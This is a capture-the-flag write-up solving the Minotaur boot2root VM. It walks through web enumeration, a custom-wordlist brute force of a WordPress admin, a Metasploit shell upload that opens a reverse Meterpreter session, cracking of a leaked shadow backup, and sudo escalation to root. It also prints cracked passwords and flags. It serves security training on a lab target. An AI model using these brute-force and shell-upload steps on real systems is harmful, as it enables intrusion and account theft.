published on in writeup
tags: sectalks

BNE0x00 - Minotaur

Minotaur CTF

Minotaur is a boot2root CTF. There are a few flag.txt files around to grab. /root/flag.txt is your ultimate goal.

Hints

  • This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.
  • One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.

Enumeration

After spinning up the VM and doing an ARP scan, we find it at 192.168.56.223. A port scan shows 3 ports available:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 ed:74:0c:c9:21:c4:58:47:d4:02:89:c7:e5:3e:09:18 (DSA)
|   2048 0c:4b:a8:24:7e:fc:cd:8a:b1:9f:87:dd:9d:06:30:05 (RSA)
|_  256 40:9b:fe:f9:82:41:17:93:a2:96:34:25:1c:53:bb:ae (ECDSA)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2020/tcp open  ftp     vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)

There doesn’t appear to be anything within the FTP share, so let’s enumerate Apache a bit more. There don’t appear to be any custom comments/changes to the default page, so directory scanning is a next logical step.

[email protected]:~# wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --sc 200 http://192.168.56.223/FUZZ/
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.56.223/FUZZ/
Total requests: 3036

==================================================================
ID	Response   Lines      Word         Chars          Request    
==================================================================

00477:  C=200    321 L	     862 W	  16057 Ch	  "bull"

Here, we find a ‘Bull Blog’, powered by Wordpress.

Wordpress

wpscan is my defacto tool for scanning Wordpress. [email protected]:~# wpscan -u http://192.168.56.223/bull/

This spits out 12 potential vulnerabilities, most of them being XSS. The most promising looking one is a Slideshow Gallery < 1.4.7 Arbitrary File Upload. However, we do need some valid credentials to do this. wpscan can enumerate users for us, which is half the battle.

    +----+-------+-------+
    | Id | Login | Name  |
    +----+-------+-------+
    | 1  | bully | bully |
    +----+-------+-------+

Now, this is where that second hint comes into play - a password we aren’t likely to find in an existing wordlist. I generated my own password list using CeWL and john - a technique I learnt way back in Hell.

[email protected]:~/minotaur# cewl -m 5 -w bulls http://192.168.56.223/bull/
[email protected]:~/minotaur# wc -l bulls 
315 bulls
[email protected]:~/minotaur# john --wordlist=bulls --rules --stdout >> bulls 
[email protected]:~/minotaur# wc -l bulls 
14590 bulls

That’s a lot of bulls :)

wpscan can also bruteforce the password for us, which is nice as we don’t have to screw around with hydra or medusa.

[email protected]:~/minotaur# wpscan -u http://192.168.56.223/bull/ -w /root/minotaur/bulls --username bully --threads 50

[+] Starting the password brute forcer
  Brute Forcing 'bully' Time: 00:03:32 <=======================================================================        > (13331 / 14591) 91.36%  ETA: 00:00:20
  [+] [SUCCESS] Login : bully Password : Bighornedbulls

I manually logged in just to make sure they worked, and I also noted that this was an admin account (which was fairly predictable due to its ID). But it does mean that we don’t actually need to exploit the Slideshow Gallery vulnerability, as we can just upload a PHP Shell via this admin panel.

Shell

I’ll just use the exploit/unix/webapp/wp_admin_shell_upload Metasploit module for this.

msf exploit(wp_admin_shell_upload) > exploit 

[*] Started reverse TCP handler on 192.168.56.101:4444 
[*] Authenticating with WordPress using bully:Bighornedbulls...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /bull/wp-content/plugins/JthxXkaTsb/zQvuEhlHdT.php...
[*] Sending stage (33684 bytes) to 192.168.56.223
[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.223:53478) at 2016-04-15 17:08:46 +0100
[+] Deleted zQvuEhlHdT.php
[+] Deleted JthxXkaTsb.php

meterpreter > sysinfo 
Computer    : minotaur
OS          : Linux minotaur 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686
Meterpreter : php/php

Flag 1

The VM description told us that there are multiple flags, the first of which is found in the webroot.

meterpreter > cat /var/www/html/flag.txt
Oh, lookey here. A flag!
Th15 15 @N [email protected] [email protected]!

Flag 2

The second flag is found in the /tmp directory, along with a priv-esc opportunity.

meterpreter > ls /tmp

100640/rw-r-----  121   fil   2015-05-27 03:47:45 +0100  flag.txt
100640/rw-r-----  1148  fil   2015-05-27 07:47:30 +0100  shadow.bak

meterpreter > cat /tmp/flag.txt
That shadow.bak file is probably useful, hey?
Also, you found a flag!
My m1L|<$|-|@|<3 br1|\|G$ @11 t3h b0y$ 2 t3h [email protected]|)

root

meterpreter > download /tmp/shadow.bak
[*] downloading: /tmp/shadow.bak -> shadow.bak

I extracted the hashes for root, minotaur, heffer and h0rnbag and ran them through john. I got one hit pretty quickly. Password1 (heffer)

I was able to use these creds and login over SSH and retrieve his flag.

[email protected]:~/minotaur# ssh [email protected]

[email protected]:~$ ls -l

-rw------- 1 heffer heffer 107 May 27  2015 flag.txt

[email protected]:~$ cat flag.txt 
So this was an easy flag to get, hopefully. Have you gotten ~minotaur/flag.txt yet?
Th3 [email protected] 15: m00000 y0

This user has a sudo entry, but it doesn’t seem to work.

[email protected]:~$ sudo -l

User heffer may run the following commands on minotaur:
    (root) NOPASSWD: /root/bullquote.sh

[email protected]:~$ sudo /root/bullquote.sh
[sudo] password for heffer: 
sudo: /root/bullquote.sh: command not found

In the time I was poking around here, I got a second password from john: obiwan6 (minotaur). I did a quick su and collected minotaur’s flag.

[email protected]:~$ su minotaur
Password: 
[email protected]:/home/heffer$ cd
[email protected]:~$ ls -l
-rw------- 1 minotaur minotaur  107 May 27  2015 flag.txt
drwxr-xr-x 4 minotaur minotaur 4096 May 27  2015 peda

[email protected]:~$ cat flag.txt 
Congrats! You've found the first flag:
M355 W17H T3H 8ULL, G37 73H H0RN!

But can you get /root/flag.txt ?

minotaur is able to run ALL as root. Which makes elevation to root nice and easy.

[email protected]:~$ sudo -l

User minotaur may run the following commands on minotaur:
    (root) NOPASSWD: /root/bullquote.sh
    (ALL : ALL) ALL

[email protected]:~$ sudo -i
[sudo] password for minotaur: 
[email protected]:~# 

Final Flag

[email protected]:~# ls -l
-rw------- 1 root root   70 May 27  2015 flag.txt
drwxr-xr-x 4 root root 4096 May 27  2015 peda
-rwx------ 1 root root  845 May 15  2015 quotes.txt

[email protected]:~# cat flag.txt 
Congrats! You got the final flag!
Th3 [email protected] is: 5urr0nd3d bY @r$3h0l35